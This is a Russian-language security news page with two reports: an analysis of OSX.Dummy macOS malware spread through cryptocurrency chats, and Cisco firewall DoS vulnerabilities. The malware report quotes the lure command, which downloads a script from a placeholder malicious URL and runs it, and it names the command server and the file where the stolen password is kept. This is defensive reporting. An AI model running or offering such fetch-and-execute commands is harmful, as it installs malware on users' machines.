Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Уязвимости в межсетевых экранах Cisco угрожали сотням тысяч устройств

В межсетевых экранах Cisco Adaptive Security Appliance и Firepower Threat Defense найдены две уязвимости, затрагивающие в общей сложности сотни тысяч устройств. Успешная эксплуатация этих дыр позволяет злоумышленнику провести DoS-атаку.

Проблемы выявил специалист Positive Technologies Никита Абрамов, который также объяснил, что для использования багов условный киберпреступник должен отправить специально созданный пакет.

«Если атака увенчается успехом, злоумышленник сможет вызвать отказ в обслуживании межсетевого экрана. После этого устройство перезагрузится, а пользователи уже не смогут попасть во внутреннюю сеть организации», — рассказывает эксперт.

«Поскольку проблема может затронуть и VPN-подключения, подобная атака способна повлиять на бизнес-процессы в условиях повсеместной удалённой работы. Масштаб выявленной уязвимости можно сравнить с CVE-2020-3259, которую нашли на 220 тысячах устройств».

Атакующему не потребуется проходить аутентификацию или получать какие-либо дополнительные права. Достаточно будет банальной отправки специального запроса по определённому пути. Как отметил Абрамов, уязвимость угрожает любой организации, использующей эти устройства для организации удалённого доступа сотрудников.

Бреши получили идентификаторы CVE-2021-1445, CVE-2021-1504 и 8,6 баллов по шкале CVSS 3.1. Таким образом, уязвимостям можно присвоить высокий уровень опасности. В Positive Technologies подчеркнули, что это логические ошибки, часто возникающие по вине разработчиков.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru